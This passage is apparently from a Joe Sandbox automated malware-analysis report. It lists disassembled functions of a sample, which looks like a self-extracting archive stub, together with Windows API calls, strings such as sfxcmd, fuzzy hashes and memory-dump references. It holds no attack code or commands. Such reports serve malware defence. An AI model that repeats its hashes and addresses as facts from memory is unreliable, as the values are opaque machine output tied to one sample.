Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: f4098470a7ca627472dd11d62a5a1384943fc694d4d36c7c72322e0aa1c807fc
Instruction ID: 0c727c07678d83c6ae40817a2a14249be5be41580afdd194604991973618d3d2
Opcode Fuzzy Hash: f4098470a7ca627472dd11d62a5a1384943fc694d4d36c7c72322e0aa1c807fc
Instruction Fuzzy Hash: 9E4166305457856FE320CB39CC05BDABBE2BF05324F104729F9E4962D1E3B5A988CBA5

Function 006FAC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006FAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006FAC96
IsDialogMessageW.USER32(0001042E,?), ref: 006FACAA
TranslateMessage.USER32(?), ref: 006FACB8
DispatchMessageW.USER32(?), ref: 006FACC2

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 5f2f07e49c62305a09cbc16971a2e1cd1e618bb5c4c37b5eb0870eeb1091e1d6
Instruction ID: 1295571519ebd030529b58b7455af8220b79cd15d5e30abd031b5248830dea82
Opcode Fuzzy Hash: 5f2f07e49c62305a09cbc16971a2e1cd1e618bb5c4c37b5eb0870eeb1091e1d6
Instruction Fuzzy Hash: 6CF03075D0212DAB8B209FE1DC4CEEB7FACEE062917808516F919D2211EB3CE416C7B5

Function 006FA335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006F00A0
Part of subcall function 006F0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,006EEB86,Crypt32.dll,00000000,006EEC0A,?,?,006EEBEC,?,?,?), ref: 006F00C2

OleInitialize.OLE32(00000000), ref: 006FA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 006FA385
SHGetMalloc.SHELL32(00728430), ref: 006FA38F

Strings

riched20.dll, xrefs: 006FA33D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: e07a17713236bb14b464007542f34048d5d0048dbfd7b6c0e6e27320990d543f
Instruction ID: 3dcf7f869c9371fbabfc629ed9f8c4a19dc59cdc29cbc7b8b2dd7a096b8e0fd2
Opcode Fuzzy Hash: e07a17713236bb14b464007542f34048d5d0048dbfd7b6c0e6e27320990d543f
Instruction Fuzzy Hash: 8EF049B5C0020DABCB50AF99D8499EFFBFCEF95301F00415BF914E2211DBB816058BA1

Function 006FD287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 006FD29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 006FD2D9

Strings

sfxcmd, xrefs: 006FD298
sfxpar, xrefs: 006FD2D4

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 7fbf11c2b67deb973b78563a4efcc1c312c5ea51e0d91cd5edeea3dbbe8a8065
Instruction ID: 7e51adbc3f97d91959f9c2c96e3cdbfbaa30f48e809d9b81e258ba0214352cf8
Opcode Fuzzy Hash: 7fbf11c2b67deb973b78563a4efcc1c312c5ea51e0d91cd5edeea3dbbe8a8065
Instruction Fuzzy Hash: C2F0277280122CA3CB202FD8DC09EFA7B6BAF09B51B004216FE4452281D625DE40D7F4

Function 006E984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006E985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 006E9876
GetLastError.KERNEL32 ref: 006E98A8
GetLastError.KERNEL32 ref: 006E98C7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: c80b12676923d9c59125a1e8fe8616aa70a7e85d5bff5427e607edbf234c4b31
Instruction ID: 41a6a79ef54fe90cd317781ab4bc8a4f0fddb16021b0179300c836f21fecbe16
Opcode Fuzzy Hash: c80b12676923d9c59125a1e8fe8616aa70a7e85d5bff5427e607edbf234c4b31
Instruction Fuzzy Hash: BC115E30901344EBDB209A56C804AAB77AFEF06771F10C92BE46A857A0D7759E419F61

Function 0070A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,006ECFE0,00000000,00000000,?,0070A49B,006ECFE0,00000000,00000000,00000000,?,0070A698,00000006,FlsSetValue), ref: 0070A526
GetLastError.KERNEL32(?,0070A49B,006ECFE0,00000000,00000000,00000000,?,0070A698,00000006,FlsSetValue,00717348,00717350,00000000,00000364,?,00709077), ref: 0070A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0070A49B,006ECFE0,00000000,00000000,00000000,?,0070A698,00000006,FlsSetValue,00717348,00717350,00000000), ref: 0070A540

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ce59dda6749aa92981099ded7e79532ce46da79b0b7931b960f2915561d9cc52
Instruction ID: d1a8575275b607e7c39478aff705f2a81a2e45a8147b6b5b2166bfc4f39f0554
Opcode Fuzzy Hash: ce59dda6749aa92981099ded7e79532ce46da79b0b7931b960f2915561d9cc52
Instruction Fuzzy Hash: C101F732611326FBCB218B7C9C44A967BD8BF45BA1F208720F906E71C0D72DDA10C6E5

Function 0070B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00708FA5: GetLastError.KERNEL32(?,00720EE8,00703E14,00720EE8,?,?,00703713,00000050,?,00720EE8,00000200), ref: 00708FA9
Part of subcall function 00708FA5: _free.LIBCMT ref: 00708FDC
Part of subcall function 00708FA5: SetLastError.KERNEL32(00000000,?,00720EE8,00000200), ref: 0070901D
Part of subcall function 00708FA5: _abort.LIBCMT ref: 00709023

Part of subcall function 0070B2AE: _abort.LIBCMT ref: 0070B2E0
Part of subcall function 0070B2AE: _free.LIBCMT ref: 0070B314

Part of subcall function 0070AF1B: GetOEMCP.KERNEL32(00000000,?,?,0070B1A5,?), ref: 0070AF46

_free.LIBCMT ref: 0070B200
_free.LIBCMT ref: 0070B236

Strings

q, xrefs: 0070B22A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: q
API String ID: 2991157371-831824133
Opcode ID: e7c9d08a325714b349aaa4851b0b704593dfc976b21736fb3a38d8d0a5c680fe
Instruction ID: 9f609e1a53c9315c422bb8e3c268b9bfd2188f03144e107cbaacb45bd04418fa
Opcode Fuzzy Hash: e7c9d08a325714b349aaa4851b0b704593dfc976b21736fb3a38d8d0a5c680fe
Instruction Fuzzy Hash: 7231F431904209EFDB10EFA9D845BADB7E5EF40320F254299F9149B2D1EB79AE41CB41

Function 006E9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,006ECC94,00000001,?,?,?,00000000,006F4ECD,?,?,?), ref: 006E9F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,006F4ECD,?,?,?,?,?,006F4972,?), ref: 006E9F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,006ECC94,00000001,?,?), ref: 006E9FB8

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7ac85bd0c0d61e884e3d10bd862c54dfb72a0a9a89a5bf336d8240a3c1668bc9
Instruction ID: da3f403ab7afd6d18861b9ef0721e591dfd04ef5792960a7cd21d6ee5efc9450
Opcode Fuzzy Hash: 7ac85bd0c0d61e884e3d10bd862c54dfb72a0a9a89a5bf336d8240a3c1668bc9
Instruction Fuzzy Hash: BA3126712093459BDF108F15D948BAABBA6EF50710F04865CF885DB2C1C774DD49CBB6

Function 006EA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA261
GetLastError.KERNEL32(?,?,?,?,006EA113,?,00000001,00000000,?,?), ref: 006EA27E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: a0abbdcfaa2dae38820c3e2f9212ea48fdd46492c7cf2810c9413a429b6b9f7a
Instruction ID: 0b4ee45dd5c9cbd8f107129f57bf1505d09edaca74c6a0252dd0ab8fee6767da
Opcode Fuzzy Hash: a0abbdcfaa2dae38820c3e2f9212ea48fdd46492c7cf2810c9413a429b6b9f7a
Instruction Fuzzy Hash: AE01D63115339869DF319BEA4C09BEE338B6F0A741F0C8455FA40F5191D756EB41866B

Function 0070AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0070B019

Strings

, xrefs: 0070B05E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 8fe10e275a0411b082d01fc5fcbf26ca773eb91788620d1bce73be35bcdfe312
Instruction ID: 671c16e76a2c02aafcd3f015ecc45f299c66da9379a9a638343c81fcbc6b12e5
Opcode Fuzzy Hash: 8fe10e275a0411b082d01fc5fcbf26ca773eb91788620d1bce73be35bcdfe312
Instruction Fuzzy Hash: 0441E77050434CEADF218B648C94AF7BBE9EB45704F1406EDE59A87182E3399F45DF60

Function 0070A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0070A79D

Strings

LCMapStringEx, xrefs: 0070A73D, 0070A747

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 35507ce52e22c859d4f435d12bff415550141d9add22dd4b8f5c733d071d1d03
Instruction ID: 25825ac30d38903206dda9bb76ab0caf2df153cc994247632fc291e38cd84b99
Opcode Fuzzy Hash: 35507ce52e22c859d4f435d12bff415550141d9add22dd4b8f5c733d071d1d03
Instruction Fuzzy Hash: 11010572540208FBCF066FA4DC05DEE3FB6EB08710F008114FE14291A0C63A8961EB91

Function 0070A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00709D2F), ref: 0070A715

Strings

InitializeCriticalSectionEx, xrefs: 0070A6E5

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9d8714ddcb46ea8dfe3e05e00f096090a52ccb10d6f67a0caec17e204723d1c4
Instruction ID: ac46e4a04e0ca0bd9d33826d415d3b12d996b7191fad88bb3a49530ccbc3fd3d
Opcode Fuzzy Hash: 9d8714ddcb46ea8dfe3e05e00f096090a52ccb10d6f67a0caec17e204723d1c4
Instruction Fuzzy Hash: 31F09A7164520CFBCB156F68CC09CEE7FB1EB48720B40C164FC195A2A0DA7A8A60EB95

Function 0070A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0070A5AE

Strings

FlsAlloc, xrefs: 0070A58A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 55506f040fdfe34d2eeb01c2a6db90d361b73e2b641ab2ebcd7866e25a938bf2
Instruction ID: 53d3faa09b8c4043bfd4e69461b6542a60f2e88af964ac0405b634a46d01471d
Opcode Fuzzy Hash: 55506f040fdfe34d2eeb01c2a6db90d361b73e2b641ab2ebcd7866e25a938bf2
Instruction Fuzzy Hash: 5BE055B078532CFBC7146B6C8C068EEBBA0EB24B10F408219FC04172C0CD7C4E00A2DA

Function 0070329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 007032AF

Strings

FlsAlloc, xrefs: 0070329E, 007032A8

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 38b4f1a11dcbe5b280a8ac70cc45bbd3297d280a13dcb44df8dfbbeae081d275
Instruction ID: 46e4e152272d6ec84a942d5b47f8ed090f507a333bfe7323b140d134906b36af
Opcode Fuzzy Hash: 38b4f1a11dcbe5b280a8ac70cc45bbd3297d280a13dcb44df8dfbbeae081d275
Instruction Fuzzy Hash: 0FD02B71780B3CFAC61432C8AC039EE7E488741FB2F450252FF0C1A1C2856D898001D9

Function 006FD8E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D, 006FD8E8

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 5dafcc28656ca0cf5cc86909d72cf9e371dd39de04b3ece6419dcc878e38833b
Instruction ID: bbaf7cccadc65e6f3ea16f8527af7295fb70203bd7d0dccd6deac7a30da3081f
Opcode Fuzzy Hash: 5dafcc28656ca0cf5cc86909d72cf9e371dd39de04b3ece6419dcc878e38833b
Instruction Fuzzy Hash: B7B012E13BD10D6C328C610C7C02E36020FC4C0F10330812EB24DD00C1E6447C860432

Function 006FD8FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 0c3fd0664dfa29e30de0e445cacd864beff75a919f55b20aee9fd3b888762ac8
Instruction ID: 474b6ead4f68bbd77c38e8518cf31881b52157e36afd60145d6aad4ed4dc05a7
Opcode Fuzzy Hash: 0c3fd0664dfa29e30de0e445cacd864beff75a919f55b20aee9fd3b888762ac8
Instruction Fuzzy Hash: 78B012E13BD00D6C324C610D7C02E36020FC4C0F10330802EB24DD00C2E6447C460432

Function 006FD8F2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

